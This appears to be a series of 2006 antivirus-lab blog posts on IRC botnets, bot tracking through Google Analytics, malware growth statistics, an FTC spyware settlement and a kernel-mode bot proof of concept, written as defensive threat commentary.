Some such bots have a funny side too, where they would display funny messages along with the IRC banner returned. One example of such bot is W32/Sdbot.worm.gen.h which connects to forum.ednet.es at port 4915. The channel is still active at the time of writing. Click here to see a screen shot of the message returned from the server.

McAfee Avert Labs has been observing such behavior lately and it has also talked about recently. Even though it claims to be one, it is not a “legit botnet”. It will happily issue commands to a bot to scan the network for vulnerable hosts and infect them. Actually, it is as insidious as any other botnet.

One can only see this message by connecting to the server using an IRC client or looking at the bots communication in an ethereal dump. A normal user, whose machine is infected, will not see this message. So, whom is this message intended for???

Possibly it is just intended for the “readers” who analyze such threats. Like, every once in a while we see a malicious executable which has a few strings just for fun or to challenge the person who is analyzing the memory dumps. Similarly I think this is just the fun part which the malware authors and AV researchers share.

Or, if you like, it can be called a social engineering technique which malware writers may use to attempt to fool “readers” to believe that this channel, even if part of a botnet is actually legal. It is, however unlikely to stop researchers from adding detection for such bots nor will it prevent the IRC channel from being taken down once discovered.

Such “special” responses could also potentially be used to obfuscate/encode information being conveyed to the bot.

Everyday we see different things that the miscreants develop to make their job easier. Today I was checking the 288th variant of Opanki. The really interesting thing about this one is that the botnet owner seems concerned over not having an organized way to check the bots, like geographic distribution, for example. But how can he or she accomplish this in an easy way? Yes, Google Analytics! As many of you know, Google offers Google Analytics (www.google.com/analytics) as a free service that allows anyone to keep collect and view tracking information about website visitors, like Unique Visitor Tracking, Daily Visitor, Geo Location…

The following code was found on this bot variant. This is typical code that one would usually add in to a webpage to make Google Analytics work:

_uacct = "UA-XXXXXX-X";

_udn="xxxxxx.com";

urchinTracker();

The _uacct and _udn are parameters that identify the site owner for later statistics.

Yet another example of how the miscreants are organizing themselves…

An epic transformation in the world of security is upon us. Today, we released the first issue of our semi-annual security magazine Sage. We will leverage this communication vehicle to deliver meaningful and sometime raw content to the masses. We take our responsibility to protect the public from malicious malcontents very seriously and will not shy away from difficult content or taboo topics. Instead, we will share with the world our day-to-day fight and let you decide how important the concepts being broached are to you.

The premiere issue examines the use of open source by the malware writing community. We show the pivotal role that code sharing and full disclosure have played in the evolution of the threat environment, and we anticipate a surge in malware quality and reliability as the malware writers become more professional. Though open source cannot be blamed for how some unsavory individuals may choose to use its tools, techniques, and methodologies, the movement should acknowledge that there are dangers associated with some of its fundamental beliefs.

Sage is meant to be a forum for thought leadership and serious discourse on topical security issues. By drawing on the Labs wealth of data and expertise, and writing challenging security articles, we hope to provoke important discussion about the digital battlefield we have found ourselves in.

Get Sage now from the McAfee Threat Center site:

http://www.mcafee.com/us/threat_center/white_paper.html

Rockets bursting in air, fireworks everywhere!  Thank you for helping mark the 200,000^th entry into the VirusScan malware (malevolent software) detection database.

But truly, this is not a moment to celebrate.  For, larger and larger numbers of malware is a plague, not a cause to celebrate.  Instead, we mark this moment simply as a milestone in our continual trip to fend off the bad stuff from everyone's machines.

It is alarming that we reach this milestone so soon after September 2004 when the count reached 100,000.  Eighteen years to reach 100,000.  Less than two years to double.  Looking ahead, our researchers expect yet another doubling in a similar timeframe.  So, 100,000 new threats in the past two years, 200,000 new threats to come in the next two years!

 Malware Count and Rate of Growth
 

The last two years have marked a tremendous increase in downloaders and bots, malware that has as its purpose to commandeer the target machine, to be used by the Command and Control machine.  Or rather, the person sitting behind that machine, who has as his motive, $$$$$$$.

In early 2004, a number of viruses like Netsky, Bagle, and Mydoom would infect multiple millions of machines with each release of a new variant.  Many millions of machines would be compromised in a short amount of time causing great financial strife and immediate reaction from IT personnel as well as law enforcement.  Soon, Sven Jaschan was arrested for the creation of the Netsky and Sasser families of viruses.  At about the same time, the author of Gaobot/Agobot and Phatbot was also arrested.  With these two events, we all hoped the arrests would stem the tide on malware.

Instead, malware distribution changed dramatically.  In the first half of 2004, 31 virus outbreaks were rated Medium and above.  The second half of 2004 saw 17 more.  That number fell to 12 for the whole of 2005.  And in 2006, there have been no outbreaks of similar severity!  Instead of huge virus events causing ire from all segments including law enforcement, the preferred method of malware distribution now involves the creation of many minor variants sent through controlled spam efforts.  Good family detection becomes crucial for a less worrisome experience on the Internet.

Another area of concern is the growth of malware targeting mobile telephony.  The numbers are still small, only near 300.  As a result, rates of growth are exaggerated.  However, it will grow.  The worry, as our past experience would show with other forms of malware, the growth will fashion similarly to the above graph.  Except, time will be compressed.  We are still in the era where malware targeting telephony is not yet purposefully stealing money.  And that is the concern.  When the phone becomes the standard means to transfer money, malware targeting telephony will truly explode, much as bots and other means to steal money over the Internet have consumed our energies these past two years.

And so, on this July 4^th, our thanks to the men and women who serve, so we can all enjoy our liberties and pursue happiness.  And thanks also to the cadre of dedicated anti-malware researchers who on this day added that 200,000^th malware detection entry, so we may pursue our enjoyment of the Internet experience with a little less worry.

In October 2004, the Federal Trade Commission started an investigation of reputed spammers. This story just finds a conclusion on May 4th, 2006. Sanford Wallace (nicknamed Spamford) and his company, Smartbot.net, have to shutdown their operation and give up to more than $4 million in ill-gotten gains. Jared Lansky, an ad broker who disseminated ads containing Wallace's spyware, will give up $227,000 in ill-gotten gains.

The FTC alleged that Sanford Wallace and his company, Smartbot.Net, exploited a security vulnerability in Microsoft's Internet Explorer's Web browser in order to distribute spyware. The spyware caused the CD-ROM tray on computers to open and then issued a "FINAL WARNING!!" to computer screens with a message that said :

If your cd-rom drive's open . . .You DESPERATELY NEED to rid your system of spyware pop-ups IMMEDIATELY! Spyware programmers can control your computer hardware if you failed to protect your computer right at this moment! Download Spy Wiper NOW!" Spy Wiper and Spy Deleter, purported anti-spyware products the defendants promoted, sold for $30.

The official documents are available here :

May 4, 2006 :

• Stipulated Final Order for Permanent Injunction and Settlement of Claims for Monetary Relief As To Defendants OptinTrade, Inc. and Jared Lansky
• Order of Default Judgment, Permanent Injunction, and Other Equitable Relief Against Sanford Wallace and SmartBot.Net, Inc.
• News Release

October 12, 2004 :

• Complaint for Injunction and Other Equitable Relief [PDF 34K]
• Memorandum in Support of Plaintiff's Motion for a Temporary Restraining Order with Expedited Discovery, Preservation of Documents and Order to Show Cause Why a Preliminary Injunction Should Not Issue Against Defendants [PDF 68K]
• News Release

An interesting few variants of an IRC bot, named http://vil.nai.com/vil/content/v_139347.htm. Rather than connecting back via DNS to an IRC server for receiving commands, the bot attempts to create a P2P network, listening on port 8 (TCP). Initial execution results in outgoing connections to one of several IP addresses (on port 8 TCP), presumably some seeded infections to spawn the P2P network. The bot spreads via email, AIM, Windows messenger and across the network.

One interesting aspect to this family is its (supposed) ability to repack itself. Though unconfirmed in replication testing thus far, reports suggest it attempts to repack itself prior to propagating. If true, would create an interesting challenge for AV scanners.

A couple weeks ago we saw a blog posting by a person named tibbar claiming they had written the first kernel mode IRC bot. See http://tibbar.blog.co.uk/2006/04/06/kernel_mode_IRCbot~708256 for the announcement.

Is this really the first kernel mode bot? I think so, but it is purely a proof of concept with no teeth. What makes this announcement important in my eyes is that it illustrates two points that are very important when we look at the future production of bots and malware in general: Use(and reuse) of open source components and the increase in programmer skillsets.

This kernel bot was easily created because it utilized a kernel socket library written and placed in the public domain by Valerino on rootkit.com (Click here for the rootkit.com post). As The Mythical Man Month states, there is no silver bullet in software development but the brass bullet is module reuse, which we are seeing more and more within malware. Would this kernel bot have been created if it wasn’t for the prebuilt components that were available?
The second important point is that the code organization of the project allows for testing the IRC functionality of the kernel bot in usermode where a lot of bot developers are more comfortable, therefore, easing the development of variants with more IRC functionality. Is this a revolutionary ability? No, but it is more advanced than most bot developers. I believe the advancement of skillsets will lead to more destructive bots as more intelligent programmers spend time increasing bot code quality, advanced features (encrypted P2P using proper key exchange for example) and test harnesses. Malware, bot development specifically, will start to exhibit the standard development life cycle seen in other open source projects such as Apache and firefox.